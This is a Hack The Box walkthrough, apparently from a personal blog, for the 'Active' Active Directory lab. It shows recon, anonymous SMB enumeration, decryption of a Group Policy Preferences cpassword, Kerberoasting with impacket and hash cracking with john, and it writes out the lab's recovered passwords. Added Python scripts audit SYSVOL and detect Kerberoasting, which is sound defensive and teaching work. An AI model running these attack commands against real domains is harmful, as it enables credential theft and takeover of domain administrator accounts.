[HTB] Active Walkthrough
Introduction
This box is Active on Hack The Box. It is rated Easy and is the third box on the AD Track.
Techniques used:
- Extract password from Group Policy Preferences XML file
- Kerberoasting
Attacker: 10.10.16.6
Target: 10.10.10.100
Recon
- nmap
sudo nmap -sV -sC 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-14 00:43:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m10s
| smb2-time:
|   date: 2024-05-14T00:44:38
|_  start_date: 2024-05-12T14:12:52
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required
The services worth looking at are DNS (domain), Kerberos, LDAP and SMB.
- smb
smbclient -N -L \\\\10.10.10.100\\
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
Replication     Disk
SYSVOL          Disk      Logon server share
Users           Disk
smbmap -H 10.10.10.100
Disk            Permissions     Comment
----            -----------     -------
ADMIN$          NO ACCESS       Remote Admin
C$              NO ACCESS       Default share
IPC$            NO ACCESS       Remote IPC
NETLOGON        NO ACCESS       Logon server share
Replication     READ ONLY
SYSVOL          NO ACCESS       Logon server share
Users           NO ACCESS
The Replication share allows anonymous (null-session) access, so connect to it without credentials (the -L flag only lists shares, so it is dropped here):
smbclient -N \\\\10.10.10.100\\Replication
Browsing around, Groups.xml sits at this path:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
- ldap
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts
dn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
Try AS-REP Roasting:
impacket-GetNPUsers active.htb/ -dc-ip 10.10.10.100 -request
No luck.
Exploit
Use this tool to recover the password from the cpassword attribute in Groups.xml:
https://github.com/t0thkr1s/gpp-decrypt
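The finding above is the classic Group Policy Preferences weakness: the cpassword attribute is AES-encrypted with a key Microsoft published, and SYSVOL is readable by Authenticated Users by default (here even anonymously). The following is an added example written for this walkthrough, not code from the post or from gpp-decrypt: a small audit script that walks a SYSVOL mount or offline copy, parses every Group Policy Preference XML file (Groups.xml as well as the other file types that carry the same attribute) and reports each element that still has a cpassword. The embedded Groups.xml is a constructed sample modelled on the file's layout; the cpassword value is a placeholder, and the GPO GUID in the demo path is a placeholder too.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preference files whose Properties element may carry a cpassword attribute
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample modelled on the Groups.xml layout found on this box.
# The cpassword value is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CONSTRUCTED_CPASSWORD_VALUE"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Attributes that name the account a cpassword belongs to, across GPP file types
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpassword_entries(xml_text, source="<string>"):
    """Return one finding per element that carries a cpassword attribute.

    Any cpassword left in SYSVOL is a finding: the value is decryptable with a
    published key, so it is effectively plaintext to anyone who can read the share.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), "")
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            # An empty cpassword sets no password; still reported so it can be cleaned up
            "has_value": bool(elem.attrib["cpassword"]),
        })
    return findings


def scan_sysvol(sysvol_root):
    """Walk a SYSVOL mount (or an offline copy) and collect cpassword findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(sysvol_root):
        for fname in filenames:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            # GPP XML files are UTF-8, sometimes with a BOM; utf-8-sig strips it
            with open(path, "r", encoding="utf-8-sig") as fh:
                try:
                    findings.extend(find_cpassword_entries(fh.read(), path))
                except ET.ParseError as exc:
                    findings.append({"file": path, "element": None, "account": "",
                                     "has_value": False, "error": str(exc)})
    return findings


def demo_scan():
    """Write the constructed sample into a SYSVOL-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo_dir = os.path.join(tmp, "active.htb", "Policies", "{GPO-GUID-PLACEHOLDER}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo_dir)
        with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for finding in demo_scan():
        print(f"{finding['file']}: <{finding['element']}> account={finding['account']!r} "
              f"cpassword_set={finding['has_value']}")
```

Run it against a mounted copy of \\dc\SYSVOL with scan_sysvol(path); every hit should be removed from the preference item and the affected account's password rotated, since the value may already have been read by any domain member.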
Try connecting to the host with evil-winrm:
evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
That failed.
Enumerate again with smbmap, this time with the credentials:
smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
Then connect with smbclient:
smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18
The flag is on the Desktop.
Privilege Escalation
Kerberos is exposed, so try Kerberoasting:
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Found this writeup:
https://github.com/ivanitlearning/CTF-Repos/blob/master/HTB/Sauna/Kerberoasting-HSmith.md
Funny enough, it is the writeup for the previous box on the AD Track.
I didn't expect it to be a time issue.
sudo ntpdate 10.10.10.100
Send the request again and the password hash comes back.
Crack it with john and rockyou:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
smbclient \\\\10.10.10.100\\Users -U Administrator%Ticketmaster1968
As before, the flag is on the Desktop.
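The Kerberoasting step above (which only worked after syncing the clock, because Kerberos rejects requests outside its default 5-minute skew tolerance, matching the -5m10s nmap reported) leaves a trace on the domain controller: event 4769 records each service ticket request, including the ticket encryption type, and tools like GetUserSPNs request RC4 (0x17) tickets because those crack fastest offline. The following is an added example for this walkthrough, not code from the post: a detection over constructed 4769 events flattened to key=value lines using the real 4769 field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status). Only SVC_TGS, Administrator and the two IPs come from this box; svc_backup is a made-up account so the burst rule has a second SPN to count.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample of 4769 (service ticket requested) events, one per line.
# svc_backup is a made-up account; the failed request at the end is ignored.
SAMPLE_EVENTS = [
    "2024-05-14T00:40:12 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.100 Status=0x0",
    "2024-05-14T00:50:01 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.16.6 Status=0x0",
    "2024-05-14T00:50:02 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.10.16.6 Status=0x0",
    "2024-05-14T00:51:30 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.10.16.6 Status=0x0",
    "2024-05-14T00:52:00 EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x17 IpAddress=::ffff:10.10.10.100 Status=0x0",
    "2024-05-14T00:53:00 EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.16.6 Status=0x7",
]


def parse_event(line):
    """Parse one flattened event line into a dict with a datetime timestamp."""
    ts_str, rest = line.split(" ", 1)
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields["timestamp"] = datetime.fromisoformat(ts_str)
    return fields


def is_rc4_user_spn_ticket(ev):
    """True for a successful RC4 service ticket for a user (non-machine) service account.

    Machine accounts (name$) and krbtgt are excluded: their passwords are long and
    random, so tickets for them are not a realistic offline-cracking target.
    """
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if ev.get("TicketEncryptionType") != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    return not (svc.endswith("$") or svc.lower() == "krbtgt")


def rc4_user_spn_tickets(lines):
    """Per-event rule: every matching event. High fidelity once the domain is AES-only."""
    return [ev for ev in map(parse_event, lines) if is_rc4_user_spn_ticket(ev)]


def kerberoast_bursts(lines, window=timedelta(minutes=5), min_services=2):
    """Aggregate rule: one requester pulling RC4 tickets for several distinct user
    SPNs inside a short window, which is the pattern GetUserSPNs -request leaves.
    The window check uses the whole first-to-last span per requester."""
    per_requester = defaultdict(list)
    for ev in rc4_user_spn_tickets(lines):
        per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = []
    for (user, ip), evs in per_requester.items():
        evs.sort(key=lambda e: e["timestamp"])
        services = sorted({e["ServiceName"] for e in evs})
        span = evs[-1]["timestamp"] - evs[0]["timestamp"]
        if len(services) >= min_services and span <= window:
            alerts.append({"requester": user, "source_ip": ip, "services": services,
                           "span_seconds": int(span.total_seconds())})
    return alerts


if __name__ == "__main__":
    for ev in rc4_user_spn_tickets(SAMPLE_EVENTS):
        print(f"RC4 ticket: {ev['TargetUserName']} -> {ev['ServiceName']} from {ev['IpAddress']}")
    for alert in kerberoast_bursts(SAMPLE_EVENTS):
        print(f"ALERT possible Kerberoasting: {alert}")
```

The per-event rule on its own is noisy in a domain that still has RC4 enabled for legacy reasons, which is why the burst rule is layered on top; the lasting fix is the one this box illustrates by counterexample: no SPN on a privileged account like Administrator, long random passwords (or gMSAs) for service accounts, and AES-only Kerberos so RC4 requests stand out.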
Afterword
I've finally finished the PWK V1 part of TJ Null's list, 30 boxes in total; I skipped the ones with very low ratings.
Back when I joined CODE, my teammate using Metasploit looked so cool, and now I'm busy learning to solve boxes without Metasploit ==
I originally planned to do one box a day, but in four months I only managed 30. Best not to talk so big.
https://flydragonw.github.io/posts/htb_active/